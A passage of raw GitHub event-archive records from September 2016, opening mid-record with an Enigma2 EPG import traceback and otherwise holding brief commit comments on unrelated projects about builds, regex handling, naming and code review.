startImport\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/EPGImport.py\", line 116, in beginImport\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/EPGImport.py\", line 125, in nextImport\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/EPGImport.py\", line 129, in fetchUrl\r\n  File \"/usr/lib/enigma2/python/Plugins/Extensions/EPGImport/EPGImport.py\", line 343, in do_download\r\ngaierror: [Errno -9] Address family for hostname not supported\r\n22:12:45.000 {   } Plugins/Extensions/EPGImport/log.py:25 write [EPGImport] nextImport, source= Rytec Germany/Austria/Swiss XMLTV\r\n22:12:45.000 {   } Plugins/Extensions/EPGImport/log.py:25 write [EPGImport] Downloading: http://91.121.106.172/~rytecepg/epg_data/rytecxmltvGermany.gz to local path: /tmp/epgimport.gz\r\n22:12:45.001 {   } mytest.py:209 init Plugin raised exception at WHERE_SESSIONSTART"}},"created_at":"2016-09-19T20:28:14Z"}
{"id":"4585722874","type":"CommitCommentEvent","actor":{"login":"TOPOVIYLOWER"},"repo":{"name":"ZLOY5/LiA"},"payload":{"comment":{"id":19085173,"position":null,"line":null,"path":null,"commit_id":"4075d477f8f9dcb8777c16a89eac317ccdcbc788","created_at":"2016-09-19T20:29:06Z","updated_at":"2016-09-19T20:29:06Z","body":"о"}},"created_at":"2016-09-19T20:29:06Z"}
{"id":"4585723018","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"fabric8io/elasticsearch-cloud-kubernetes"},"payload":{"comment":{"id":19085175,"position":64,"line":174,"path":"pom.xml","commit_id":"ec06ed57c51bb3fd0ed7331d1f9fac27f6e89c3a","created_at":"2016-09-19T20:29:08Z","updated_at":"2016-09-19T20:29:08Z","body":"Not sure - for some reason our build machines are using java-1.7 - going to see if I can get them to use 1.8 - looks like java-1.8 is generally available for el7, so not sure why they are still using 1.7"}},"created_at":"2016-09-19T20:29:08Z"}
{"id":"4585723106","type":"CommitCommentEvent","actor":{"login":"akisch"},"repo":{"name":"akisch/S4"},"payload":{"comment":{"id":19085176,"position":null,"line":null,"path":null,"commit_id":"527e66bc49083307e80b360c8405c872d2a9c5e0","created_at":"2016-09-19T20:29:08Z","updated_at":"2016-09-19T20:29:08Z","body":"standardize_hn1 should no longer break things. It takes the same arg as standardize_hn, and returns 2 values (the first of which is the same as standardize_hn's return value)"}},"created_at":"2016-09-19T20:29:08Z"}
{"id":"4585724593","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19085178,"position":22,"line":452,"path":"chrome/browser/net/blockers/blockers_worker.cc","commit_id":"94405c33b6f81a16da881032978ce92480e9dab2","created_at":"2016-09-19T20:29:24Z","updated_at":"2016-09-19T20:29:24Z","body":"what issue is this fixing? i think the `to` rule string should never contain `$` since it's not a regex."}},"created_at":"2016-09-19T20:29:24Z"}
{"id":"4585727236","type":"CommitCommentEvent","actor":{"login":"ximex"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":19085185,"position":null,"line":null,"path":null,"commit_id":"23499830c25074582835ac6274797e372459728b","created_at":"2016-09-19T20:29:54Z","updated_at":"2016-09-19T20:29:54Z","body":"the functions in `adm_program/modules/backup/backup.functions.php` aren't uesed and necessary any more"}},"created_at":"2016-09-19T20:29:54Z"}
{"id":"4585727930","type":"CommitCommentEvent","actor":{"login":"mfaywu"},"repo":{"name":"mfaywu/job-search-tool"},"payload":{"comment":{"id":19085186,"position":null,"line":null,"path":null,"commit_id":"8bc222b4ed49b03faf883ce108fa06f249696bae","created_at":"2016-09-19T20:30:03Z","updated_at":"2016-09-19T20:30:03Z","body":"#10 Can now add tasks, independent of company. Display tasks most recent on top"}},"created_at":"2016-09-19T20:30:03Z"}
{"id":"4585728223","type":"CommitCommentEvent","actor":{"login":"rminnich"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19085189,"position":396,"line":865,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-19T20:30:07Z","updated_at":"2016-09-19T20:30:07Z","body":"this is really good. The reason is that the earlier code might repeatedly read status and that would potentially clear bits (not all reads are side effect free.)"}},"created_at":"2016-09-19T20:30:07Z"}
{"id":"4585728244","type":"CommitCommentEvent","actor":{"login":"Pjotor87"},"repo":{"name":"niklasHagner/Style-Showcase"},"payload":{"comment":{"id":19085190,"position":null,"line":null,"path":null,"commit_id":"b8ac3186b0fc257ea5a5c7ebcdb5434b1c917380","created_at":"2016-09-19T20:30:07Z","updated_at":"2016-09-19T20:30:07Z","body":"Just doin my job 😎"}},"created_at":"2016-09-19T20:30:07Z"}
{"id":"4585728250","type":"CommitCommentEvent","actor":{"login":"Ne0blast"},"repo":{"name":"muonium/core"},"payload":{"comment":{"id":19085191,"position":56,"line":294,"path":"application/controllers/User.php","commit_id":"8065aaab3799f8872caf9c098d4bd2e7e92fefff","created_at":"2016-09-19T20:30:07Z","updated_at":"2016-09-19T20:30:07Z","body":"Nope, binary is the best for transferring data like that. There's no loss."}},"created_at":"2016-09-19T20:30:07Z"}
{"id":"4585732269","type":"CommitCommentEvent","actor":{"login":"mattsunsjf"},"repo":{"name":"marklogic/marklogic-contentpump"},"payload":{"comment":{"id":19085209,"position":null,"line":null,"path":null,"commit_id":"d248388f988d4861da56b5c48a690d1d46a74c46","created_at":"2016-09-19T20:30:47Z","updated_at":"2016-09-19T20:30:47Z","body":"Hi @jxchen-us , you checked in an xcc jar with FINE logging enabled with this patch, is this intended?"}},"created_at":"2016-09-19T20:30:47Z"}
{"id":"4585733454","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/puppet"},"payload":{"comment":{"id":19085213,"position":1,"line":1,"path":"modules/base/manifests/arcanist.pp","commit_id":"fc2ad7c1cd48b235d4c375fa1db631a281fcff2e","created_at":"2016-09-19T20:31:00Z","updated_at":"2016-09-19T20:31:00Z","body":"naming!"}},"created_at":"2016-09-19T20:31:00Z"}
{"id":"4585735438","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/puppet"},"payload":{"comment":{"id":19085216,"position":4,"line":4,"path":"modules/base/manifests/arcanist.pp","commit_id":"fc2ad7c1cd48b235d4c375fa1db631a281fcff2e","created_at":"2016-09-19T20:31:23Z","updated_at":"2016-09-19T20:31:23Z","body":"naming again, will likely cause failures"}},"created_at":"2016-09-19T20:31:23Z"}
{"id":"4585738710","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/puppet"},"payload":{"comment":{"id":19085224,"position":5,"line":14,"path":"modules/mediawiki/manifests/init.pp","commit_id":"fc2ad7c1cd48b235d4c375fa1db631a281fcff2e","created_at":"2016-09-19T20:31:57Z","updated_at":"2016-09-19T20:31:57Z","body":"this should be in base otherwise only mediawiki servers will ever have the chance to use the arcanist flag."}},"created_at":"2016-09-19T20:31:57Z"}
{"id":"4585740454","type":"CommitCommentEvent","actor":{"login":"cccm5"},"repo":{"name":"APDevTeam/iFill"},"payload":{"comment":{"id":19085232,"position":null,"line":null,"path":null,"commit_id":"dbd11c3762541b8529daa376b4d5e86788b095c9","created_at":"2016-09-19T20:32:14Z","updated_at":"2016-09-19T20:32:14Z","body":"Oh that was just cause on the jenkins server that I build plugins from there's an issue with building from java8, there should be no need to merge it"}},"created_at":"2016-09-19T20:32:14Z"}
{"id":"4585741565","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/puppet"},"payload":{"comment":{"id":19085237,"position":5,"line":14,"path":"modules/mediawiki/manifests/init.pp","commit_id":"fc2ad7c1cd48b235d4c375fa1db631a281fcff2e","created_at":"2016-09-19T20:32:27Z","updated_at":"2016-09-19T20:32:27Z","body":"also should be hiera('arcanist') for style\r\n"}},"created_at":"2016-09-19T20:32:27Z"}
{"id":"4585744777","type":"CommitCommentEvent","actor":{"login":"jimmidyson"},"repo":{"name":"fabric8io/elasticsearch-cloud-kubernetes"},"payload":{"comment":{"id":19085249,"position":64,"line":174,"path":"pom.xml","commit_id":"ec06ed57c51bb3fd0ed7331d1f9fac27f6e89c3a","created_at":"2016-09-19T20:33:04Z","updated_at":"2016-09-19T20:33:04Z","body":"Our build slaves run el7 & java 8 so..."}},"created_at":"2016-09-19T20:33:04Z"}
{"id":"4585746303","type":"CommitCommentEvent","actor":{"login":"Appebyte"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19085252,"position":22,"line":22,"path":"Week 2/ahmed/Exercise6.hs","commit_id":"6620a76cd3f38dc148c8bda6718e7fd2cf10ee3a","created_at":"2016-09-19T20:33:21Z","updated_at":"2016-09-19T20:33:21Z","body":"Great point! Thanks 👍 :) "}},"created_at":"2016-09-19T20:33:21Z"}
{"id":"4585746581","type":"CommitCommentEvent","actor":{"login":"kasin1126"},"repo":{"name":"kasin1126/resitAssingmet"},"payload":{"comment":{"id":19085255,"position":1,"line":1,"path":"README.md","commit_id":"31c78b976b452d1652cbc0fa58cd2174da59c576","created_at":"2016-09-19T20:33:24Z","updated_at":"2016-09-19T20:33:24Z","body":"Download the zg file\r\n"}},"created_at":"2016-09-19T20:33:24Z"}
{"id":"4585747204","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19085256,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T20:33:30Z","updated_at":"2016-09-19T20:33:30Z","body":"All of CommProto is mutated versions for windows, linux, and osx"}},"created_at":"2016-09-19T20:33:30Z"}
{"id":"4585748753","type":"CommitCommentEvent","actor":{"login":"danfowler"},"repo":{"name":"frictionlessdata/goodtables-web"},"payload":{"comment":{"id":19085264,"position":5,"line":14,"path":"web/theme/templates/base.html","commit_id":"9450beef15998c7e7c2b058c4267bc22676e6cd2","created_at":"2016-09-19T20:33:47Z","updated_at":"2016-09-19T20:33:47Z","body":"It looks like this change to the CSS broke the pull-down tab on the top: https://github.com/frictionlessdata/goodtables-web/issues/63\r\n\r\n@smth do you have any ideas?"}},"created_at":"2016-09-19T20:33:47Z"}
{"id":"4585749470","type":"CommitCommentEvent","actor":{"login":"gregburek"},"repo":{"name":"heroku/pg_sslstatus"},"payload":{"comment":{"id":19085269,"position":3,"line":3,"path":"debian/copyright","commit_id":"566097b9435128b5b500fe3d834de5b65d69bfa5","created_at":"2016-09-19T20:33:54Z","updated_at":"2016-09-19T20:33:54Z","body":"oops. Need to fix."}},"created_at":"2016-09-19T20:33:54Z"}
{"id":"4585751147","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19085271,"position":38,"line":1367,"path":"FHEM/00_SIGNALduino.pm","commit_id":"86f6fdb810699ad68560c7aa70954429b5e2607c","created_at":"2016-09-19T20:34:12Z","updated_at":"2016-09-19T20:34:12Z","body":"Die älteren Mancester Nachrichten dürfen nicht invertiert werden"}},"created_at":"2016-09-19T20:34:12Z"}
{"id":"4585754949","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"johanna08/pasturetopantry"},"payload":{"comment":{"id":19085275,"position":43,"line":43,"path":"browser/js/cart/cart.js","commit_id":"deaee48e5825249168239d10bd6a05abfcf49aff","created_at":"2016-09-19T20:34:54Z","updated_at":"2016-09-19T20:34:54Z","body":"missing error handling "}},"created_at":"2016-09-19T20:34:54Z"}
{"id":"4585757884","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085283,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-19T20:35:27Z","updated_at":"2016-09-19T20:35:27Z","body":"May be better to use explicit aliases in request? For example:\r\n```\r\ntag1.tag2.tag3.tag4|transform.rate where app in ('app1') and host in ('host1') {app1 host1 tag1.tag2.tag3.tag4} from 1474294444791 to 1474296244791\r\n```"}},"created_at":"2016-09-19T20:35:27Z"}
{"id":"4585759378","type":"CommitCommentEvent","actor":{"login":"niklasf"},"repo":{"name":"georgvonzimmermann/Sunsetter8"},"payload":{"comment":{"id":19085285,"position":296,"line":296,"path":"bughouse.cpp","commit_id":"57cd08ed52526c79c2add0b25bc96f6b222fe16c","created_at":"2016-09-19T20:35:45Z","updated_at":"2016-09-19T20:35:45Z","body":"The opening book implementation always expected the standard position as the starting position. So I added a custom flag, that gets set to true when the new `setBoard` is used. So it's just a hack to avoid calling `bookMove` in that case. Probably there is a more elegant way ..."}},"created_at":"2016-09-19T20:35:45Z"}
{"id":"4585759478","type":"CommitCommentEvent","actor":{"login":"121815"},"repo":{"name":"EmmanuelG/Mondrian"},"payload":{"comment":{"id":19085286,"position":149,"line":149,"path":".gitignore","commit_id":"9a0615608a83d2ffbae1169a8a334f87e94cfb98","created_at":"2016-09-19T20:35:47Z","updated_at":"2016-09-19T20:35:47Z","body":"K"}},"created_at":"2016-09-19T20:35:47Z"}
{"id":"4585760942","type":"CommitCommentEvent","actor":{"login":"121815"},"repo":{"name":"EmmanuelG/Mondrian"},"payload":{"comment":{"id":19085288,"position":157,"line":157,"path":".gitignore","commit_id":"9a0615608a83d2ffbae1169a8a334f87e94cfb98","created_at":"2016-09-19T20:36:03Z","updated_at":"2016-09-19T20:36:03Z","body":"Y"}},"created_at":"2016-09-19T20:36:03Z"}
{"id":"4585769387","type":"CommitCommentEvent","actor":{"login":"File14"},"repo":{"name":"Creeperface01/SynapseAPI"},"payload":{"comment":{"id":19085306,"position":null,"line":null,"path":null,"commit_id":"dff6ce87ad84a1d65fb02eef3c79f233bb8cd322","created_at":"2016-09-19T20:37:35Z","updated_at":"2016-09-19T20:37:35Z","body":"How to transfer player now? There code is broken."}},"created_at":"2016-09-19T20:37:35Z"}
{"id":"4585769559","type":"CommitCommentEvent","actor":{"login":"Appebyte"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19085307,"position":22,"line":22,"path":"Week 2/ahmed/Exercise6.hs","commit_id":"6620a76cd3f38dc148c8bda6718e7fd2cf10ee3a","created_at":"2016-09-19T20:37:37Z","updated_at":"2016-09-19T20:37:37Z","body":"Kudos to you, I appreciate the feedback! :) "}},"created_at":"2016-09-19T20:37:37Z"}
{"id":"4585771958","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085316,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-19T20:38:04Z","updated_at":"2016-09-19T20:38:04Z","body":"input_processor_refactor (mbadams5) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-50.64%25-red.svg)</a> \n"}},"created_at":"2016-09-19T20:38:04Z"}
{"id":"4585773238","type":"CommitCommentEvent","actor":{"login":"priseborough"},"repo":{"name":"3drobotics/ardupilot-solo"},"payload":{"comment":{"id":19085323,"position":26,"line":208,"path":"libraries/AP_Motors/AP_MotorsMatrix.cpp","commit_id":"3348d492cf172951547ad6b2da382bbb771c42d1","created_at":"2016-09-19T20:38:18Z","updated_at":"2016-09-19T20:38:18Z","body":"I'll push a fix"}},"created_at":"2016-09-19T20:38:18Z"}
{"id":"4585774591","type":"CommitCommentEvent","actor":{"login":"benjaminoakes"},"repo":{"name":"Liaison-Intl/upgrade_toolbelt"},"payload":{"comment":{"id":19085327,"position":1,"line":62,"path":"Gemfile.lock","commit_id":"15068d33be5c2bec21892e634d8a287be1b7ec49","created_at":"2016-09-19T20:38:32Z","updated_at":"2016-09-19T20:38:32Z","body":"This commit should begin with `[NF-8840]`, not `[Nf-8840]`."}},"created_at":"2016-09-19T20:38:32Z"}
{"id":"4585778548","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19085333,"position":92,"line":75,"path":"GoIT_Project_1/src/module_5_homework/Controller.java","commit_id":"aac25e2b84e76da1b0ba2d269e0c6ec4bc061b8a","created_at":"2016-09-19T20:39:17Z","updated_at":"2016-09-19T20:39:17Z","body":"Метод должен возвращать число совпадений.  (int), причем GoogleAPI или BookingComAPI ты задаешь только в методе main"}},"created_at":"2016-09-19T20:39:17Z"}
{"id":"4585782686","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"mrclay/minify"},"payload":{"comment":{"id":19085342,"position":5,"line":8,"path":"server-info.php","commit_id":"9370e96fd454549876210e35070c82d189ca00b7","created_at":"2016-09-19T20:40:01Z","updated_at":"2016-09-19T20:40:01Z","body":"this was changed to `true` by mistake?"}},"created_at":"2016-09-19T20:40:01Z"}
{"id":"4585783937","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19085345,"position":36,"line":36,"path":"browser/js/product/product.js","commit_id":"4a11415c7ac724e6da5abd9b93e3d8049fcfa31e","created_at":"2016-09-19T20:40:15Z","updated_at":"2016-09-19T20:40:15Z","body":"`catch`"}},"created_at":"2016-09-19T20:40:15Z"}
{"id":"4585787632","type":"CommitCommentEvent","actor":{"login":"simark"},"repo":{"name":"polarsys-rover/polarsys-userspace"},"payload":{"comment":{"id":19085350,"position":10,"line":72,"path":"rover_mqtt/src/PicoBorgRevReal.cpp","commit_id":"f62afcf2fed3d53986217d64ebf68fbbadde6a76","created_at":"2016-09-19T20:40:56Z","updated_at":"2016-09-19T20:40:56Z","body":"Damnit!  Il manque `ret =`, c'est pour ça que ça marche pas! "}},"created_at":"2016-09-19T20:40:56Z"}
{"id":"4585788206","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19085351,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-19T20:41:02Z","updated_at":"2016-09-19T20:41:02Z","body":"5665-coincident-plant-bug (mjwitte) - x86_64-MacOS-10.9-clang: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T20:41:02Z"}
{"id":"4585788882","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19085352,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T20:41:10Z","updated_at":"2016-09-19T20:41:10Z","body":"update:\r\nWhen i finished the build and flashed it i had that assert failed loki,sh\r\n\r\nwhen i make the edits i told u about ( also edited the releasetools.py ) i flashed fine and rebooted to system fine.\r\n\r\nPS\r\nGenerally,i cant make an installable build with just synced sources.here is what i do\r\ni firstly clean ,then . build/envsetup.sh   then lunch and select jdc_jflte-user and then mka otapackage\r\nbuild always gives me that loki error at twrp.after the above \"fix\" i got no errors"}},"created_at":"2016-09-19T20:41:10Z"}
{"id":"4585789060","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19085353,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T20:41:11Z","updated_at":"2016-09-19T20:41:11Z","body":"> As for debian, oh well, it's still a dependency hell, and people at debian world are still waiting for terminix to compile for them!!\r\n\r\nIndeed :laughing: \r\n\r\nI will try to look into the launchpad thing asap. I've seen it being done on Launchpad I am just not sure if its possible to people outside of Ubuntu."}},"created_at":"2016-09-19T20:41:11Z"}
{"id":"4585791278","type":"CommitCommentEvent","actor":{"login":"andreaquintero"},"repo":{"name":"andreaquintero/plataformaedu3"},"payload":{"comment":{"id":19085360,"position":null,"line":null,"path":null,"commit_id":"eda03fac8900674d6c089a9e623a360ba5522a9d","created_at":"2016-09-19T20:41:36Z","updated_at":"2016-09-19T20:41:36Z","body":"[DIAGRAMA DE GANTT.pdf](https://github.com/andreaquintero/plataformaedu3/files/481077/DIAGRAMA.DE.GANTT.pdf)\r\n[DICCIONARIO DATOS.docx](https://github.com/andreaquintero/plataformaedu3/files/481079/DICCIONARIO.DATOS.docx)\r\n[ENCUESTA_10-05-2016.docx](https://github.com/andreaquintero/plataformaedu3/files/481081/ENCUESTA_10-05-2016.docx)\r\n[formatos caso de usoss.pdf](https://github.com/andreaquintero/plataformaedu3/files/481080/formatos.caso.de.usoss.pdf)\r\n![imagen diagrama distribucion](https://cloud.githubusercontent.com/assets/21346149/18648267/85becab0-7e7f-11e6-925f-6123f3ab4862.jpg)\r\n[MER.PROYECTO.pdf](https://github.com/andreaquintero/plataformaedu3/files/481078/MER.PROYECTO.pdf)\r\n[MODELO ENTIDAD DE RELACION.pdf](https://github.com/andreaquintero/plataformaedu3/files/481082/MODELO.ENTIDAD.DE.RELACION.pdf)\r\n\r\n[prueba caja negra.docx](https://github.com/andreaquintero/plataformaedu3/files/481083/prueba.caja.negra.docx)\r\n[REQUERIMIENTOSFUNCIONALES Y NOFUNCIONALES.pdf](https://github.com/andreaquintero/plataformaedu3/files/481084/REQUERIMIENTOSFUNCIONALES.Y.NOFUNCIONALES.pdf)\r\n[source del text.txt](https://github.com/andreaquintero/plataformaedu3/files/481085/source.del.text.txt)\r\n[test.pdf](https://github.com/andreaquintero/plataformaedu3/files/481086/test.pdf)\r\n![use case diagram1](https://cloud.githubusercontent.com/assets/21346149/18648268/85fca56a-7e7f-11e6-897d-26492ea5af88.jpg)\r\n"}},"created_at":"2016-09-19T20:41:36Z"}
{"id":"4585792701","type":"CommitCommentEvent","actor":{"login":"andreaquintero"},"repo":{"name":"andreaquintero/plataformaedu3"},"payload":{"comment":{"id":19085362,"position":null,"line":null,"path":null,"commit_id":"eda03fac8900674d6c089a9e623a360ba5522a9d","created_at":"2016-09-19T20:41:52Z","updated_at":"2016-09-19T20:41:52Z","body":"cuarto trimestre"}},"created_at":"2016-09-19T20:41:52Z"}
{"id":"4585794219","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19085364,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T20:42:10Z","updated_at":"2016-09-19T20:42:10Z","body":"In what sense is this code unsafe? Is there an example of otherwise-unrejected code that leads to runtime error using this operation?"}},"created_at":"2016-09-19T20:42:10Z"}
{"id":"4585796131","type":"CommitCommentEvent","actor":{"login":"thybag"},"repo":{"name":"creesch/Reddit-Enhancement-Suite"},"payload":{"comment":{"id":19085371,"position":4,"line":513,"path":"lib/css/modules/_showImages.scss","commit_id":"c8b6916c20d712e05003c28218de869ff551fed9","created_at":"2016-09-19T20:42:30Z","updated_at":"2016-09-19T20:42:30Z","body":"Given the \"wikipedia logo\" image is always going to be the first one (since its prepended), it may potentially be cleaner to just select on `img:first-child`. (unless your working on a way to bypass the class stripping)"}},"created_at":"2016-09-19T20:42:30Z"}
{"id":"4585796676","type":"CommitCommentEvent","actor":{"login":"SergeyZhukovsky"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19085372,"position":22,"line":452,"path":"chrome/browser/net/blockers/blockers_worker.cc","commit_id":"94405c33b6f81a16da881032978ce92480e9dab2","created_at":"2016-09-19T20:42:36Z","updated_at":"2016-09-19T20:42:36Z","body":"The issue is that\r\nhttps://github.com/brave/chromium/issues/12\r\nthe rule is that\r\n\"rule\":[{\"$\":{\"from\":\"^http://([^/@:\\\\.]+)\\\\.github\\\\.io/\",\"to\":\"https://$1.github.io/\"}}]\r\nto is a string on which we should replace to, JavaScript RegExp engine interpret $1 is a placeholder, so in our case it'll do http://iamvp7.github.io to https://iamvp7.github.io. $1 is iamvp7 in that case. RE2 RegExp in chromium on cpp use '\\1', '\\2',..., '\\n' instead of '$1', '$2',...,'$n'.\r\nI got always https://$1.github.io on that website before that fix. "}},"created_at":"2016-09-19T20:42:36Z"}
{"id":"4585797609","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19085374,"position":41,"line":35,"path":"GoIT_Project_1/src/module_5_homework/BookingComAPI.java","commit_id":"aac25e2b84e76da1b0ba2d269e0c6ec4bc061b8a","created_at":"2016-09-19T20:42:46Z","updated_at":"2016-09-19T20:42:46Z","body":"\"roomObjs[i] = rooms[i]\" это {null,null,null, room[3], null, room[4]...}"}},"created_at":"2016-09-19T20:42:46Z"}
{"id":"4585799312","type":"CommitCommentEvent","actor":{"login":"Piorjade"},"repo":{"name":"Piorjade/cLinux"},"payload":{"comment":{"id":19085384,"position":null,"line":null,"path":null,"commit_id":"b937305c5992c9eeab01cdd4b33e210f13c23970","created_at":"2016-09-19T20:43:06Z","updated_at":"2016-09-19T20:43:06Z","body":"Lol forgot to delete /usr/bin/cd as I implemented it into the OS :D"}},"created_at":"2016-09-19T20:43:06Z"}
{"id":"4585801111","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085395,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T20:43:25Z","updated_at":"2016-09-19T20:43:25Z","body":"Oh, you should probably report that bug to [autonome/silobuster](https://github.com/autonome/silobuster/issues), ;)"}},"created_at":"2016-09-19T20:43:25Z"}
{"id":"4585803718","type":"CommitCommentEvent","actor":{"login":"brupm"},"repo":{"name":"doximity/exceptions-client"},"payload":{"comment":{"id":19085398,"position":null,"line":null,"path":null,"commit_id":"bc2280b3e628b4aae95ad091ebeaf99b57fd3537","created_at":"2016-09-19T20:43:54Z","updated_at":"2016-09-19T20:43:54Z","body":"👍 "}},"created_at":"2016-09-19T20:43:54Z"}
{"id":"4585804453","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085399,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T20:44:02Z","updated_at":"2016-09-19T20:44:02Z","body":"`(?=.UnitedStates.)(?=.Arkansas.)^(?!.Rogers.)(?=.bo.)(?=.all)` - this regex not work in your case. Did you checked it?"}},"created_at":"2016-09-19T20:44:02Z"}
{"id":"4585805463","type":"CommitCommentEvent","actor":{"login":"kgrgreer"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19085401,"position":51,"line":207,"path":"src/core/Slot.js","commit_id":"27f72d42a1e56d555412ccf1e1e2a602c28a4428","created_at":"2016-09-19T20:44:14Z","updated_at":"2016-09-19T20:44:14Z","body":"Let's just remove 'src' and let you add whatever you want to the subscription, then it won't be an issue."}},"created_at":"2016-09-19T20:44:14Z"}
{"id":"4585806839","type":"CommitCommentEvent","actor":{"login":"seanupton"},"repo":{"name":"plone/mockup"},"payload":{"comment":{"id":19085405,"position":145,"line":156,"path":"mockup/js/utils.js","commit_id":"6994b72516d8d5d9109c7993a5747c9a77d3cfc6","created_at":"2016-09-19T20:44:30Z","updated_at":"2016-09-19T20:44:30Z","body":"Hey, sorry I deleted the original line comment, but I wasn't really correctly understanding scope of the function (as a callback) when I commented... so this line is not source of the problem; I will file and issue, and I will spend some significant time in debugger later this week trying to hunt this TypeError on breadcrumbs down."}},"created_at":"2016-09-19T20:44:30Z"}
{"id":"4585808934","type":"CommitCommentEvent","actor":{"login":"Cronus89"},"repo":{"name":"InvoicePlane/InvoicePlane"},"payload":{"comment":{"id":19085410,"position":null,"line":null,"path":null,"commit_id":"6c1cb132dd57cba31907c163c46293be16021876","created_at":"2016-09-19T20:44:53Z","updated_at":"2016-09-19T20:44:53Z","body":"I've fixed it myself, Was just letting you know this breaks default functionality since you now have the base_url set to \r\n$config['base_url'] = $config['protocol'] . ($_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']) . URL_SUBFOLDER;"}},"created_at":"2016-09-19T20:44:53Z"}
{"id":"4585809748","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19085411,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-19T20:45:03Z","updated_at":"2016-09-19T20:45:03Z","body":"Yes, if alias is set for the metrics, it displays alias only. In that case also, function names were displayed previously. Changed that too. \r\n\r\nIf there is no alias set in Editpanel by user , do we need to set it internally like what you said? Is it so?  "}},"created_at":"2016-09-19T20:45:03Z"}
